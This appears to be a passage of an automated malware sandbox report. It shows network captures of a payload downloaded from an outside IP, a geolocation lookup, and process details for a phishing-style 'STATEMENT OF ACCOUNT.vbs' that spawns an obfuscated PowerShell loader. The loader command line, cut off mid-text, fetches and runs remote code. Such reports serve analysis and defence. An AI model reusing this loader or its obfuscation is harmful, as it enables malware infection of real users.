                  Data Raw: 63 51 47 62 36 77 4a 33 34 4c 75 45 77 52 59 41 36 77 4c 47 72 6e 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 76 46 64 75 58 77 30 57 43 56 78 41 5a 76 72 41 68 38 2b 67 66 45 64 36 66 68 2b 36 77 4b 56 57 2b 73 43 7a 68 61 42 36 57 48 64 6f 46 74 78 41 5a 76 72 41 69 62 6c 36 77 49 7a 38 65 73 43 64 6b 57 36 75 54 62 63 31 75 73 43 68 38 6e 72 41 72 4a 63 63 51 47 62 63 51 47 62 4d 63 72 72 41 6b 4a 63 36 77 4b 35 42 49 6b 55 43 2b 73 43 50 5a 4a 78 41 5a 76 52 34 75 73 43 38 30 5a 78 41 5a 75 44 77 51 54 72 41 74 4a 41 36 77 4c 65 7a 59 48 35 50 4e 48 35 41 58 7a 4b 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 49 2b 48 72 41 6a 49 78 69 63 50 72 41 6c 4c 6a 63 51 47 62 67 63 50 71 52 4c 59 42 36 77 4b 58 6d 48 45 42 6d 37 71 58 55 4b 6a 68 63 51 47 62 63 51 47 62 67 65 6f 66 61 62 44 57 63 51 47 62 36 77 4a 33 42 49 48 43 69 42 67 49 39 65 73 43 79 41 54 72 41 6e 50 33 63 51 47 62 63 51 47 62 63 51 47 62 63 51 47 62 69 77 77 51 36 77 4a 41 4c 6e 45 42 6d 34 6b 4d 45 33 45 42 6d 33 45 42 6d 30 [TRUNCATED]
                  Data Ascii: cQGb6wJ34LuEwRYA6wLGrnEBmwNcJARxAZvrAvFduXw0WCVxAZvrAh8+gfEd6fh+6wKVW+sCzhaB6WHdoFtxAZvrAibl6wIz8esCdkW6uTbc1usCh8nrArJccQGbcQGbMcrrAkJc6wK5BIkUC+sCPZJxAZvR4usC80ZxAZuDwQTrAtJA6wLezYH5PNH5AXzKcQGbcQGbi0QkBOsCI+HrAjIxicPrAlLjcQGbgcPqRLYB6wKXmHEBm7qXUKjhcQGbcQGbgeofabDWcQGb6wJ3BIHCiBgI9esCyATrAnP3cQGbcQGbcQGbcQGbiwwQ6wJALnEBm4kME3EBm3EBm0LrAo/k6wLP7IH6VNQEAHXWcQGbcQGbiVwkDHEBm3EBm4HtAAMAAHEBm+sCjXiLVCQIcQGbcQGbi3wkBHEBm3EBm4nr6wJSlHEBm4HDnAAAAHEBm3EBm1PrAvQFcQGbakBxAZvrAqekietxAZvrAiOmx4MAAQAAAKATAnEBm3EBm4HDAAEAAOsCZyxxAZtT6wL6busCvyiJ6+sC9aJxAZuJuwQBAABxAZvrAoh2gcMEAQAAcQGbcQGbU3EBm+sCF0Zq/+sC/VzrAvHXg8IF6wKn7XEBmzH26wLcjesCJRExyXEBm+sC3mSLGnEBm3EBm0HrAgUrcQGbORwKdfNxAZvrAtyxRnEBm3EBm4B8Cvu4dd7rAoqB6wLZXItECvxxAZtxAZsp8HEBm+sCNnr/0nEBm3EBm7pU1AQA6wJgmXEBmzHA6wLnzOsCEWqLfCQM6wJdQusC2vaBNAfX1quxcQGbcQGbg8AEcQGb6wJ2+DnQdeXrAliicQGbiftxAZvrAnm0/9dxAZtxAZteM2z0al9nOxBXxgxC+NkCVqMW15U2LzCSa8WS0LnnTppr3ktXKLXkXjMScw/dODA+rcXMNldadXpVITAmTWy87FJ7dpPbq7YQhZ/jbTirsddXUQZ8aeG+Wi9rtdeMKsXa1j
                  Jul 2, 2024 10:27:04.914340973 CEST1236INData Raw: 48 37 54 5a 55 71 78 64 72 57 54 77 67 74 6a 73 31 47 46 4c 4d 2b 4d 4a 50 62 71 7a 59 63 47 6e 74 48 45 66 30 69 4e 46 48 58 71 37 48 75 42 68 4d 53 2b 42 71 70 31 31 49 56 6e 6a 77 74 45 4d 53 63 69 42 57 53 31 65 49 64 75 6d 44 66 73 4a 4a 7a
                  Data Ascii: H7TZUqxdrWTwgtjs1GFLM+MJPbqzYcGntHEf0iNFHXq7HuBhMS+Bqp11IVnjwtEMSciBWS1eIdumDfsJJz1hcgNFHXq7FeYwiw19YVnKGt+zA5uK7m2O54MCEHwM/673gwOSCy67uwkmnuJyAEdNersdhTwk4oKS97Uw/NNA7r13Mt1ZJ6XlPTsNfWIiyb16ux7gf4NTA+x3vT1i9xXpPvNB8/jTnT1lxwB42JtrFTaT5Ssqqx1
                  Jul 2, 2024 10:27:04.914354086 CEST1236INData Raw: 51 6c 59 76 34 41 77 41 36 49 73 50 4d 34 53 73 69 70 73 64 64 74 31 6c 71 7a 67 53 70 43 61 76 75 50 6b 59 52 74 59 4d 4b 51 34 69 70 43 39 47 4d 59 48 46 59 39 34 42 32 68 4a 79 70 43 32 35 4c 56 47 56 37 4e 71 4f 64 41 6e 72 75 69 51 48 52 68
                  Data Ascii: QlYv4AwA6IsPM4Ssipsddt1lqzgSpCavuPkYRtYMKQ4ipC9GMYHFY94B2hJypC25LVGV7NqOdAnruiQHRhXQztRik/zqC/9wqLnxiuAnBGv81h/+lgLCuNKnJzQj5PVj3PqgGj+DpKyKmx1z7FLtPWIgwP16uxXhH9D9/EW/ZWEFSORGAqR4nF3B9WEOfe23kit6bmmc1mpdaKoeXVtm4iikTftiFe1G8cYzJl5uo/XnB/UX5Wn
                  Jul 2, 2024 10:27:04.914407969 CEST1236INData Raw: 34 55 2b 44 6a 59 6d 4a 47 6f 53 75 53 4e 49 6d 77 65 6b 71 74 55 6c 78 6a 73 72 63 70 39 69 70 55 46 58 70 4b 59 57 42 72 52 46 54 2b 4d 67 51 41 59 2b 4f 67 73 6c 49 6a 7a 61 33 54 4c 38 6c 42 58 33 53 4f 31 69 57 66 61 74 36 77 4c 49 6a 49 44
                  Data Ascii: 4U+DjYmJGoSuSNImwekqtUlxjsrcp9ipUFXpKYWBrRFT+MgQAY+OgslIjza3TL8lBX3SO1iWfat6wLIjIDlk3R2o6ldctRj+q+afoIgmeLLcav9wq3D8F/5Fp73ZZtOu1L+ApHSma0Vj0+znHYKkLLhAjGVj2Qr1NWIqIz4jTq5gnvD7id0niN5MbRzFRFGQz60PYtSatNv1xtuIgfxJDgGno1nRW48w8q/R5zl4DqVuKPU+4pK
                  Jul 2, 2024 10:27:04.914421082 CEST896INData Raw: 48 58 6a 73 30 30 42 59 6e 34 43 71 30 6d 4e 43 68 57 4a 58 55 48 6d 42 45 71 51 73 7a 51 39 5a 46 57 50 52 53 4f 57 61 6a 39 4c 56 34 77 6f 71 39 4b 37 6e 50 4d 32 42 53 78 48 6b 63 6b 41 42 52 74 31 62 2b 43 75 79 55 31 55 58 7a 58 42 44 7a 36
                  Data Ascii: HXjs00BYn4Cq0mNChWJXUHmBEqQszQ9ZFWPRSOWaj9LV4woq9K7nPM2BSxHkckABRt1b+CuyU1UXzXBDz6lcn24tQ3P7iXwFiN80aIeyFpbdDbca+Dbc00HIgqzKPi/LHX2S+TfNar6tJ9n+E/GmApGUz4NGI8ZOygs/1810OfgQ3yWHyednr27OA/hPJqqs2EbReWwDoqWv6de1RWJT5LBcAqci0MwF6GSiJQ1s8211IV0aPs5
                  Jul 2, 2024 10:27:05.172465086 CEST1236INData Raw: 52 58 49 6e 44 77 30 6a 72 68 6f 78 50 54 73 68 32 49 45 6f 62 43 6a 2b 2b 6f 34 30 74 66 53 62 6a 56 53 79 35 4a 71 38 47 4a 75 36 34 58 63 66 44 43 4b 4f 64 2f 4e 4d 45 4d 4f 6f 38 77 74 45 4a 4d 61 67 56 71 4a 4f 4a 33 67 6e 52 61 61 46 46 50
                  Data Ascii: RXInDw0jrhoxPTsh2IEobCj++o40tfSbjVSy5Jq8GJu64XcfDCKOd/NMEMOo8wtEJMagVqJOJ3gnRaaFFPyqjCj76RkmG4B/io0TpanVJU61ar19TW1qu+WD04sdeOZwuIoAuz69eqO0gNyp1q0Xw86ldqIspZqTAWAN5jCVdCZT69dOBcW8ez19aksMCuq7HX1qux19arsdfWq7HMxD4n/YmOhJXUDPSLFT45lBlDpsT/yDeph
                  Jul 2, 2024 10:27:05.172533989 CEST224INData Raw: 79 77 6e 53 45 59 4a 70 35 76 59 57 4b 4e 77 54 56 62 75 36 7a 39 53 49 69 4b 6e 30 76 4a 56 68 49 36 6b 72 70 44 6b 7a 2f 79 50 4c 58 58 50 74 45 31 30 39 59 56 34 50 68 38 73 33 32 68 63 37 4a 39 56 45 4f 35 66 6f 37 69 56 41 43 48 67 47 50 48
                  Data Ascii: ywnSEYJp5vYWKNwTVbu6z9SIiKn0vJVhI6krpDkz/yPLXXPtE109YV4Ph8s32hc7J9VEO5fo7iVACHgGPHE940fP2EBMEM2sIvtq3VZsRJemw/V23Pf1xDMCGkpeSAGnMouUq7qDY0vWfjEDjVXbyHgtKLrsED6NwyIV35C4hN9VJWJNizXGwqQ/IGoGRWJLFKCVoio0sQsnG/bLVML/C6ZiJQahjMO+
                  Jul 2, 2024 10:27:05.172544003 CEST1236INData Raw: 61 4a 63 30 43 6a 36 4e 4b 61 43 32 2b 49 67 43 68 4f 4f 44 73 4e 45 79 63 4a 6a 6e 35 71 6b 52 6b 39 49 35 35 39 72 69 72 79 4c 2b 74 57 45 4f 69 58 53 58 39 73 4e 4d 66 55 71 37 48 38 74 50 52 36 56 6d 4f 37 73 39 66 57 50 4a 4a 57 73 69 6f 63
                  Data Ascii: aJc0Cj6NKaC2+IgChOODsNEycJjn5qkRk9I559riryL+tWEOiXSX9sNMfUq7H8tPR6VmO7s9fWPJJWsiocx9SrsblNUR5WU7uz19YY6MvWkATH1Kuxopz5CzHiXv9WJBUPXF8qc3+gKomASiJW1sE211IM2bN8GnZThZgIGIY5a5wCz9pN2+CKqHsSLp6ad0eEkphx4yEUB+7vFPFZBb2vsdjXv5XX1qux19arsdfWq7HX1qfV+
                  Jul 2, 2024 10:27:05.172559977 CEST1236INData Raw: 65 72 73 59 35 57 56 4c 6d 4a 56 35 2b 56 6d 71 6e 54 51 78 73 6a 35 2f 4e 73 6d 4e 66 67 37 55 66 63 49 44 61 36 75 6c 4b 33 70 5a 59 77 2b 2f 49 69 49 31 44 31 4b 70 33 7a 31 65 75 2b 7a 34 59 54 41 50 59 6f 70 34 51 6d 49 52 41 69 2b 69 54 49
                  Data Ascii: ersY5WVLmJV5+VmqnTQxsj5/NsmNfg7UfcIDa6ulK3pZYw+/IiI1D1Kp3z1eu+z4YTAPYop4QmIRAi+iTIuw3TGT8T7PgtXjWiskpTa87QRI1ErQa+x5CNcSz0U2arcO6YXJ6wLnGMsJJwj4AVi40WezARxQBDm1ddz+dKQjAh4DB0eVdtSoXDDuJLX0iw5EvNiCSntnTkmSzYVd0b5sooxE/0PqO3pvN4oj1y/rE46EbN1YO9o
                  Jul 2, 2024 10:27:05.172583103 CEST1236INData Raw: 53 4e 72 50 4e 4f 56 66 64 4f 6e 4e 35 5a 62 43 75 67 58 75 4f 75 39 34 44 6c 49 6e 77 37 6a 37 39 58 56 65 4c 6d 69 65 4c 71 37 79 76 79 34 57 39 41 31 4e 72 59 34 2b 2b 6e 72 6b 61 75 63 57 44 37 2b 49 51 70 4b 4f 74 44 58 73 59 55 44 43 43 4a
                  Data Ascii: SNrPNOVfdOnN5ZbCugXuOu94DlInw7j79XVeLmieLq7yvy4W9A1NrY4++nrkaucWD7+IQpKOtDXsYUDCCJF8onnniKCKAfR2SPmvg0OMIhoHUt4pkcJ+leU8ew19b7CX7v8YDi8m4fauN7MiNaIqmli1LTMedGvShSje3X34+92Q98VCg6Yy18RErfDAPz4G7Clm+mV1qbV/vHMD6eIkLKX5KVCIeCx1bm6KgVJjjekbOyimSO8
                  Jul 2, 2024 10:27:05.172594070 CEST1236INData Raw: 44 72 6d 57 73 77 49 43 6c 6a 72 4f 35 58 58 4c 50 4f 6a 65 49 77 49 41 2b 6c 34 48 70 58 62 49 72 4b 63 55 6e 6e 53 31 39 4e 73 4f 6c 4c 7a 59 67 55 71 36 38 61 74 58 30 79 36 5a 30 79 77 59 45 5a 66 50 42 4c 55 69 6a 70 68 41 4a 78 32 50 54 6e
                  Data Ascii: DrmWswICljrO5XXLPOjeIwIA+l4HpXbIrKcUnnS19NsOlLzYgUq68atX0y6Z0ywYEZfPBLUijphAJx2PTnpK3lViglfSac9TUPiaSwE/OrsdfWq7HX1qux19arsdo63Y6I1TxPQ7F/nh8uqmrUKR7x1tar5mivMWnFV1znJUr2MCD1iewcV1z3+8p7MBBgMUt8hzc4NteSLO8c1b6Pv3Wnel8aSyCKuxXFO+A+3+TyL7/LWKaOD


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449738103.237.86.247807772C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 10:27:48.102791071 CEST172OUTGET /NtqoCaH77.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Cache-Control: no-cache
                  Jul 2, 2024 10:27:49.085515976 CEST1236INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Tue, 02 Jul 2024 07:57:18 GMT
                  Accept-Ranges: bytes
                  ETag: "6a397655ccda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 08:27:43 GMT
                  Content-Length: 494656
                  Data Raw: b6 df 27 57 fa ca 74 bd f1 34 ec 54 9c 97 81 6f 68 d4 eb 6c 5e 53 08 f2 d3 97 57 c2 16 30 b5 2e 08 b9 1f 7a 55 9b fd 42 bd 23 48 87 bb 6f db e1 71 af f2 84 ac 8f 15 6b 00 3c d0 7c 80 4a f4 78 71 b0 aa 42 88 99 de 62 49 ac 82 41 3a 7d 40 01 08 51 7e a8 a9 03 3a ed 02 7c 17 98 14 d1 fc af 0d 1e da 7d ea e2 94 fd 6c 77 40 8c 09 36 a1 d6 6c 45 a9 4b 23 78 09 c7 67 a4 72 7f 79 10 68 d1 47 94 68 17 5b 09 42 47 df ef e7 c3 f6 13 81 7c a8 20 db 7c 55 b0 93 cf 56 fa 2a c6 ce 35 b5 fa a6 e8 6d da 85 58 fc 1e 46 16 fa 3f a4 28 cd 6d 12 45 4e a4 f3 b6 e9 2c 04 10 ee 89 75 38 12 71 b8 06 07 d4 54 7d 3c c2 20 19 15 94 32 31 4a 34 b3 f4 c6 95 7d c4 64 92 8f a7 21 94 d0 91 f1 d3 8a 92 00 60 5c b1 1b 31 78 36 ea 5f 12 56 4b f4 67 73 bc c0 58 f7 08 f4 0b 75 a1 06 f2 89 33 99 43 e3 bc a2 ca b7 cc 49 6a b4 4e 0a 2f b4 1c 66 bf d1 c6 46 d7 bd 3c a7 bc a2 b5 71 24 24 3b 45 0f 62 d2 ab 27 fa be be ff 3c f6 ca f7 84 0e 09 02 0d 56 48 bd 5d 52 e2 56 34 d1 48 c6 2d 41 8b e7 7a 21 0f 03 ef b3 b9 bc 7b c4 ad 5e e2 45 95 58 53 [TRUNCATED]
                  Data Ascii: 'Wt4Tohl^SW0.zUB#Hoqk<|JxqBbIA:}@Q~:|}lw@6lEK#xgryhGh[BG| |UV*5mXF?(mEN,u8qT}< 21J4}d!`\1x6_VKgsXu3CIjN/fF<q$$;Eb'<VH]RV4H-Az!{^EXS"Gv`P" b54._1~?wQwV_d|?9$/t#,0kWs"Y.<CB{=HO2e"l0y.t7aD}1wG46)=uqz#G7Q0YIvERSOC}QokALvQhCm{H`/0~/EzHx%I?:[8ktU!boFw@!{SaH/I4Ug5T3s~]V1{7\;k,@#8M=A8c;WR4%#FJ~8yv5G:di-R2#v^.htp-prE|G/Q%Z6uWiNU>5NJo\Odn%{BAId2uQT;Z| -]_#t:Lxi{VHKe??~#E2^6l,#YAD2;hOT;2$"$}ie4w~)tv
                  Jul 2, 2024 10:27:49.085537910 CEST224INData Raw: 41 e4 3d 6f 35 0a 76 9c 80 48 9c c8 c1 7f 2c ec ba 0d 1e dd cb 9a df ee c2 df d1 17 09 8c 35 8a 28 06 57 b0 15 1c a4 c3 0b ea af b5 73 01 ef d1 a9 c4 a5 86 a4 6a b5 ee ee e1 9a 7c a9 b5 56 c3 ff 53 4e 71 c1 11 fc c2 66 86 65 e4 53 10 74 58 42 cd
                  Data Ascii: A=o5vH,5(Wsj|VSNqfeStXB=GSq>;lTy\b3\Gw4#tTd9Q[N|!>JQ9)zS?|G_o[JU{fp_Xa:+w7Sq
                  Jul 2, 2024 10:27:49.085553885 CEST1236INData Raw: 1a b8 78 94 67 23 1e 46 f3 7f 73 c9 6a b6 4b 9d 46 f4 03 5c 45 78 51 25 80 54 00 fd f0 05 12 24 af ea c0 fa 3c b1 79 bb 60 a8 28 b3 98 f1 e7 fa 04 25 bc a3 2c 3f 80 02 e3 c6 af 4e 84 a8 bd ee 75 2f 5a 2d fd d4 52 f6 0c 39 82 92 7b ae 7e 3f c8 59
                  Data Ascii: xg#FsjKF\ExQ%T$<y`(%,?Nu/Z-R9{~?Yx4`77xbpAA,`]GJ}WhC%(Iojp%6qsFE3yJxqrJCAFL$w-e,me2?^i9+&!Qp~0?K
                  Jul 2, 2024 10:27:49.085566998 CEST1236INData Raw: 3e 12 e7 f3 50 8e 21 3e 65 d8 ce 99 f2 41 e8 bb 34 3a 5b 42 4e f9 4b 27 3a 1f 55 d7 03 33 ed 30 d1 32 0f 5c 57 7d 0f f2 74 71 10 98 a7 d7 85 f0 f0 6a 36 bb f2 f8 8b f0 c9 9a 96 63 7b 3f 58 6f 90 c8 9a d7 59 fd 0d 0f dd ad a3 74 61 c4 fc 9e cd 20
                  Data Ascii: >P!>eA4:[BNK':U302\W}tqj6c{?XoYta @.Q*Q7Vg-0)5%x,x];4y_jM|`J-afd{7nZ#_>OE!!th,3d!}lF2Cmk`NL_yXS"+\.htFd
                  Jul 2, 2024 10:27:49.085578918 CEST1236INData Raw: cc 52 a4 53 71 fb f8 4d 71 1d 80 d7 a6 f8 18 3f 14 78 42 65 58 b4 2f aa 23 5c 1a 9d 83 45 f1 91 64 71 ff be 00 a6 05 c9 e0 49 ce e2 07 6b 23 d4 0d 60 e8 f2 7f 37 c5 b0 50 65 9c e3 aa ca bd cf a1 d7 d7 c8 61 71 74 17 93 48 1c f5 a1 fb e2 08 32 a7
                  Data Ascii: RSqMq?xBeX/#\EdqIk#`7PeaqtH2!osw>f-p)t#"+&wHgXv#5T9Q8Hs,Wt-Q,*>5 r|j5=sS2H@qVnTi4'=JAt+A#Sw
                  Jul 2, 2024 10:27:49.085592031 CEST672INData Raw: dc 7a 0e ba 64 f3 f1 35 f7 6d 0e c1 fb 15 43 6e 99 0d a2 c0 8b f1 01 80 35 b9 ba 4d a8 30 49 f6 ea aa 8b 59 95 2f 1c d8 ca 68 fe 8d cd 9c 91 2f 1f 9d e0 79 ff 7b 1d c9 00 26 f5 57 b6 57 36 47 df 8b 3b 96 67 9f 3f d7 73 7d 70 75 40 74 2f 9a c8 16
                  Data Ascii: zd5mCn5M0IY/h/y{&WW6G;g?s}pu@t/{%f<_xO(a+D?2u: _GStr!9d^&_^$wLK}eG?U~,#:nW;8j,#:X*kO*jy*O$
                  Jul 2, 2024 10:27:49.340919971 CEST1236INData Raw: 86 ad 64 06 c6 1a ca 74 f5 c2 01 ce e2 56 d4 00 6f 6b 4d 08 e4 fd 1b 84 01 b0 91 cf ff 1f 0a 27 6e cf 05 19 d9 4a aa 77 a7 14 cc 26 22 b1 ea d9 8c c5 bc ea 45 79 86 6b 8e 29 fb 9f d4 dc 3f 42 8b 10 d8 eb 4a 27 84 1e 46 42 70 88 b3 e1 7f f6 f2 c1
                  Data Ascii: dtVokM'nJw&"Eyk)?BJ'FBp>P%:c.0.Rr8GmYhE b=>67_ @Zv|ahdZf#ubd>Gg.$$27hk-S)U|F"
                  Jul 2, 2024 10:27:49.340940952 CEST1236INData Raw: ad 53 3b 74 ff dd 53 40 6a 64 9a 58 d2 3d 21 23 0e 1e df fc 61 40 6d 0e 70 7a 40 22 06 60 ac 38 bb e1 20 f9 45 fa 9d a6 8b be 36 c9 75 22 a1 d2 6a e1 a6 78 e4 48 e6 5b 87 fe cf 8f 4d a6 e4 03 be 2b dc d1 2b 88 82 9d 64 94 2c 59 22 ff f0 08 d5 53
                  Data Ascii: S;tS@jdX=!#a@mpz@"`8 E6u"jxH[M++d,Y"StP|>k^1EU?gg\cVK:<u4-yg_%,d{>TfA]`|jM6){F9~Xi8z(5wV]G"9?entnA_rY~+
                  Jul 2, 2024 10:27:49.340954065 CEST448INData Raw: 46 ce c4 81 4d 53 fc 9d 87 aa 12 e2 b2 cc dd ab a7 41 17 91 53 b2 f2 88 79 19 15 57 b5 9d 0b 81 23 82 45 13 8b b9 6d 41 61 bc da 0e 68 09 51 c3 f6 b8 26 6c 02 7f 58 b8 2a 6a 2d 21 bb 27 4b 21 4d 92 95 92 3c e8 94 da 16 85 dd 23 95 cd 90 ab 9c 45
                  Data Ascii: FMSASyW#EmAahQ&lX*j-!'K!M<#E1%I?;jK!tcimKXP&5W9p/;%\}9ttz!5m qx{`RGLfvPCJN6S+
                  Jul 2, 2024 10:27:49.340965986 CEST1236INData Raw: 5c c0 3f 89 59 ea d8 d8 b7 8a 73 11 e7 df b0 fd 3d e2 35 ac 04 87 ef 37 c4 bc 37 97 83 e0 43 d8 96 69 2d 23 37 36 c0 da 02 35 6e f6 d1 17 26 22 62 4f 3f 7a a1 8c 35 53 2b d2 df ef 65 41 9d 31 13 71 b4 14 f9 15 db c2 15 bd 68 e3 c0 52 21 e6 df 4a
                  Data Ascii: \?Ys=577Ci-#765n&"bO?z5S+eA1qhR!JabgvtK.@v)BSb.5Us%!hn179Uh\o$t;Og9mzz!\2Y&^Eo$_.X61khY$
                  Jul 2, 2024 10:27:49.340977907 CEST1236INData Raw: 7f 2f 65 6a 6d c1 8f 7a 68 d7 e1 79 ce 3f 96 e1 84 76 15 b1 b4 6c a2 6b 2d 35 2e d6 15 4d e2 90 41 2b da c1 1a 20 34 c4 41 47 24 67 04 07 cd 47 ce f6 5b d2 9d de fe 07 58 dd 58 69 f0 3b ea 23 79 8a 40 60 15 76 5f 1d 29 b5 38 71 63 c9 b2 5e 60 08
                  Data Ascii: /ejmzhy?vlk-5.MA+ 4AG$gG[XXi;#y@`v_)8qc^`HMoA@dE 3bV668IuUAf9BPHQasfIVs/5ZE:Busg9*pCBm_NMf;v]JS4.xprqC#)@


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449741178.237.33.50807772C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 10:27:54.823252916 CEST71OUTGET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jul 2, 2024 10:27:55.434142113 CEST1170INHTTP/1.1 200 OK
                  date: Tue, 02 Jul 2024 08:27:55 GMT
                  server: Apache
                  content-length: 962
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:04:26:58
                  Start date:02/07/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
                  Imagebase:0x7ff733cd0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:1
                  Start time:04:27:00
                  Start date:02/07/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc 